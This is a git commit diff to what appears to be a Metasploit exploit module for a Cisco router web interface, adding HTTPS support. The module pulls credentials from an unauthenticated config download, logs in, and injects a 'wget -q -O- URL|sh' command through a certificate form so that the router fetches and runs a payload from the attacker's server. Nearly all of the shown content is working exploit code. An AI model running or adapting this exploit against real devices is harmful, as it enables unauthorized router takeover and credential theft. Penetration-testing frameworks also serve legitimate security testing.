Checked the functionality of module. Added ability to connect via HTTPS.

master
blightzero 2019-03-14 15:54:02 +01:00
parent 0551f3df3c
commit 1e00c28701
1 changed files with 38 additions and 28 deletions

View File

@ -58,8 +58,10 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(8007), # port of Cisco webinterface Opt::RPORT(8007), # port of Cisco webinterface
OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']), OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]) OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),
OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.
]) ])
deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.
end end
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
@ -79,13 +81,19 @@ class MetasploitModule < Msf::Exploit::Remote
def primer def primer
payload_url = get_uri payload_url = get_uri
print_status("Downloading configuration from #{peer}") print_status("Downloading configuration from #{peer}")
res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")}) if(datastore['USE_SSL'])
print_status("Using SSL connection to router.")
end
res = send_request_cgi({
'uri' => normalize_uri("cgi-bin","config.exp"),
'SSL' => datastore['USE_SSL']
})
unless res unless res
vprint_error('Connection failed.') vprint_error('Connection failed.')
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Could not download config. Aborting.') vprint_error('Could not download config. Aborting.')
return nil return nil
end end
@ -99,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Using default auth_key #{authkey}") print_status("Using default auth_key #{authkey}")
res2 = send_request_cgi({ res2 = send_request_cgi({
'uri' => normalize_uri("cgi-bin","userLogin.cgi"), 'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=" 'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
}) })
@ -108,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
return nil return nil
end end
unless res.status == 200 unless res.code == 200
vprint_error('Login failed with downloaded credentials. Aborting.') vprint_error('Login failed with downloaded credentials. Aborting.')
return nil return nil
end end
@ -120,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Sending payload. Staging via #{payload_url}.") print_status("Sending payload. Staging via #{payload_url}.")
#Build staging command #Build staging command
command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'") command_string = CGI::escape("'$(wget -q -O- #{payload_url}|sh)'")
if(command_string.length <= 50) if(command_string.length <= 63)
print_status("Staging command length looks good. Sending exploit!") print_status("Staging command length looks good. Sending exploit!")
else else
vprint_error("Warning: Staging command length probably too long. Trying anyway...") vprint_error("Warning: Staging command length probably too long. Trying anyway...")
@ -128,6 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
res3 = send_request_cgi({ res3 = send_request_cgi({
'uri' => normalize_uri("certificate_handle2.htm"), 'uri' => normalize_uri("certificate_handle2.htm"),
'SSL' => datastore['USE_SSL'],
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'vars_get' => { 'vars_get' => {
@ -140,10 +150,10 @@ class MetasploitModule < Msf::Exploit::Remote
'submitStatus' => '1', 'submitStatus' => '1',
'log_ch' => '1', 'log_ch' => '1',
'type' => '4', 'type' => '4',
'Country' => 'US', 'Country' => 'A',
'state' => 'CA', 'state' => 'A',
'locality' => 'DC', 'locality' => 'A',
'organization' => 'cc', 'organization' => 'A',
'organization_unit' => 'A', 'organization_unit' => 'A',
'email' => 'any@example.com', 'email' => 'any@example.com',
'KeySize' => '512', 'KeySize' => '512',